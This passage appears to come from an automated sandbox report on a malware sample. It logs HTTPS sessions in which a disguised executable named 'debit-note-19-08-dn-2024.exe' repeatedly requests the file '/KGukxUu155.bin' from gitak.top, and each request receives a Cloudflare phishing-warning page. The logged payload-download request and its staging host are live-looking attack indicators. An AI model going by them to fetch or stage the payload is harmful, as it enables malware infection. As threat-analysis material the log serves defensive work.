                              2024-08-26 13:36:37 UTC1369INData Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 6e 5f 73 38 6f 58 41 65 37 41 41 6d 6d 5f 71 39 58 36 43 35 68 56 71 68 55 47 44 5a 36 33 4d 71 62 45 4e 4f 6f 34 56 73 6e 6e 30 2d 31 37 32 34 36 37 39 33 39 36 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73
                              Data Ascii: <input type="hidden" name="atok" value="n_s8oXAe7AAmm_q9X6C5hVqhUGDZ63MqbENOo4Vsnn0-1724679396-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
                              2024-08-26 13:36:37 UTC852INData Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65
                              Data Ascii: r sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
                              2024-08-26 13:36:37 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              26192.168.11.2049843172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:36:47 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:36:47 UTC539INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:36:47 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BdmAy1RnZWFIKVlLXAzmkd3miWr2yINqlkTOgd1TRVbrJBW84s0rHMB3ra%2FgU1q%2FO48JLXvlX9IBrbm0dhZsVMCrTQSw68fk353mrWQLbvs5w%2F671F3P8a68XGI%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b943678a8d89c3d-IAD
                              2024-08-26 13:36:47 UTC830INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:36:47 UTC1369INData Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a
                              Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:36:47 UTC1369INData Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 4b 65 73 4a 72 36 49 7a 44 67 35 72 39 4e 6e 64 51 79 7a 44 55 45 75 7a 79 42 45 4b 74 58 4b 43 54 48 6b 6c 50 37 61 68 5f 55 55 2d 31 37 32 34 36 37 39 34 30 37 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79
                              Data Ascii: <input type="hidden" name="atok" value="KesJr6IzDg5r9NndQyzDUEuzyBEKtXKCTHklP7ah_UU-1724679407-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
                              2024-08-26 13:36:47 UTC850INData Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f
                              Data Ascii: sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
                              2024-08-26 13:36:47 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              27192.168.11.2049844172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:36:57 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:36:58 UTC535INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:36:57 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wuW2MsJEv1kXM8Oar1Sy5SE4B8eHbq3mIKVTSJLbqAQZCPFCHiJa0qjfdkXpsxLGgCX65t6ePVm%2FeHDnHAQZEPa8OrrxFgFq8DDY7OfsqsIlqBZEG1Zqd2O9vVI%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9436ba4a00821a-IAD
                              2024-08-26 13:36:58 UTC834INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:36:58 UTC1369INData Raw: 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 20 20
                              Data Ascii: " /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:36:58 UTC1369INData Raw: 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 6f 55 75 64 4c 37 43 2e 4e 4d 49 75 6f 66 67 50 4b 70 46 56 75 4b 59 65 62 70 76 49 50 51 43 62 79 50 45 2e 62 62 32 74 39 41 41 2d 31 37 32 34 36 37 39 34 31 37 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22
                              Data Ascii: ut type="hidden" name="atok" value="oUudL7C.NMIuofgPKpFVuKYebpvIPQCbyPE.bb2t9AA-1724679417-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="
                              2024-08-26 13:36:58 UTC846INData Raw: 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f
                              Data Ascii: idden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></
                              2024-08-26 13:36:58 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              28192.168.11.2049845172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:37:08 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:37:08 UTC541INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:37:08 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xBVzMKlfR0%2FLMqfuJN7mwdNempjq5O3AUMADfVymwABJUtBuXHt%2F5HBHchbDI%2FuUXid3XobP44nFhqJt05gw0IEPTTQ7gcvTgxkTFs6dWcWfJInifP%2FQQBGTOvw%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9436fbfce8c5c3-IAD
                              2024-08-26 13:37:08 UTC828INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:37:08 UTC1369INData Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29
                              Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
                              2024-08-26 13:37:08 UTC1369INData Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 42 35 46 41 66 50 39 4e 33 5a 48 71 68 73 74 4f 64 73 32 6f 41 6d 4e 54 57 67 67 7a 75 6f 4f 6d 54 43 52 72 44 67 44 35 4d 73 67 2d 31 37 32 34 36 37 39 34 32 38 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73
                              Data Ascii: <input type="hidden" name="atok" value="B5FAfP9N3ZHqhstOds2oAmNTWggzuoOmTCRrDgD5Msg-1724679428-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
                              2024-08-26 13:37:08 UTC852INData Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65
                              Data Ascii: r sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
                              2024-08-26 13:37:08 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              29192.168.11.2049846172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:37:18 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:37:19 UTC545INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:37:18 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MCnukM%2FE3%2B0BcIxy%2BRuJwfh7YNh6Jw8ZyrcuJacwFoMEcxSTaYRH9Qk2y9jYArJQCzTU6KrCD%2F88GWWYPSsBlx5t9rNXP31X01b3MTP%2Fw%2BLJo5Cmx2ilnlKP5hI%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b94373daee92899-IAD
                              2024-08-26 13:37:19 UTC824INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:37:19 UTC1369INData Raw: 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65
                              Data Ascii: ors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-ale
